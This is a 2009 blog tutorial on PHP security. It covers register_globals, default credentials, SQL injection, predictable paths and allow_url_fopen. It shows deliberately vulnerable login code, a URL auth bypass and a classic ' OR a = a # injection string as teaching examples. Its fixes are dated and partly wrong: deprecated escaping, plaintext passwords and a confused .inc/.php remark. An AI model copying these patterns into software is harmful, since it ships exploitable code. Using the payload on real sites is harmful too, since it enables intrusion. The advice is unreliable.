SECURED PHP CODING – Part One

bephpbee — Mon, 02 Nov 2009 11:45:20 +0000

This is an article about how to keep your web document as secured as possible while using PHP as a scripting language. PHP is widely used scripting language and most of the developers preferred MySql database as it default to PHP and easy to communicate from PHP. PHP runs under almost every web server and operating system.

List of basic security issues

malicious data from users of the website
default credentials
SQL Injection
predictable path
allow url fopen

malicious data from users of the website

First and foremost, If you think about writing a secured web document, you should not trust your user and their inputs to the website as it may contain malicious code. It is not always a malicious user who can exploit a security hole – problems can just as easily arise because of a user unintentionally doing something wrong. Expect every single data from the users should be validated at client side as well server side. Javascript is the fair enough to do this client side validation.

In php.ini file you can see register_globals that allow to create global variables and its scope will be throughout the website. It cause some security hole in the document.

if($username == “john” && $password == “password123″)

{

$auth = 1;

}else

{

$auth = 0;

}

here the malicious user can pass the $auth value in the url as http://www.sitename.com?auth=1

The first, and perhaps the best, is to set “register_globals” to off. The second is to ensure that you only use variables that you have explicitly set yourself. In the above example, that would mean adding “$auth = 0;” at the beginning of the script.

Using “preg_replace” function, replace the tags and scripts from the user and use “strip_tags” before use the inputs.

default credential

By default, mysql username is root and password may be empty. So before start everything change this credentials to non predictable one. If you have hosted your site in shared host then change your control panal,FTP access credentails over the period of time. php.ini have the option to comment the php functions if they are not really used for this particular website.

SQL Injection

The most common security hazard faced when interacting with a database is that of SQL Injection – when a user uses a security glitch to run SQL queries on your database. Take an example of login system, the common sql will be

mysql_query(“SELECT Username, Password FROM admin_access WHERE Username = ‘”.$_POST['txt_user'].”‘ and Password = ‘”.$_POST['txt_pass'].”‘”);

here this query will be executed in the mysql engine fetch the data from the database if they are valid. In the txt_user is a text filed where the users will try to inject their code to compromise your site as below

they will type ‘ OR a = a # in the user text box, then the sql query will be

SELECT Username, Password FROM admin_access WHERE Username = ” OR a=a # and Password = ’123456′

so userame = empty or a=a(this is always true) and mysql stop reading after # symbol as it mean that after which they are commented. So this query will return all the values from the admin_access table and most of the developer used to have the first record as super admin’s details. So the hackers job will be a easiest one to compromise your admin area.

solution

function check_login_input($value)

{

if (get_magic_quotes_gpc())

{

$value = stripslashes($value);

}

$value = mysql_real_escape_string($value);

return $value;

}

$username = check_login_input($_POST['txt_user']);

$password = check_login_input($_POST['txt_pass']);

$check = mysql_query(“SELECT Username, Password FROM admin_access WHERE Username = ‘”.$username.”‘ and Password = ‘”.$password.”‘”);

Now, unless you happen to have a user with a very unusual username and a blank password, your malicious attacker will not be able to do any damage at all. It is important to check all data passed to your database like this, however secure you think it is. HTTP Headers sent from the user can be faked. Their referral address can be faked. Their browsers User Agent string can be faked. Do not trust a single piece of data sent by the user, though, and you will be fine.

predictable path

Should not use the predictable path like ” includes,images,admin” so on.. So the hackers easily predict this folders and this folders may contain some valuable files like database connections or something about may disclose the server details. Avoid use .php extension rather using .inc. inc will display your username, password or db hosting details in the browser. But php just execute and display the result only. Each folder should be enabled directory listing denied and each folder should have index file to redirect to error page if the hack to see the list of files in the directory.

allow url fopen

unless if allow url fopen really not used in the website, you should keep it off in the php.ini settings or through .htaccess. Other wise it helps the hackers to read and write in your files.

Be a PHP Bee

SECURED PHP CODING – Part One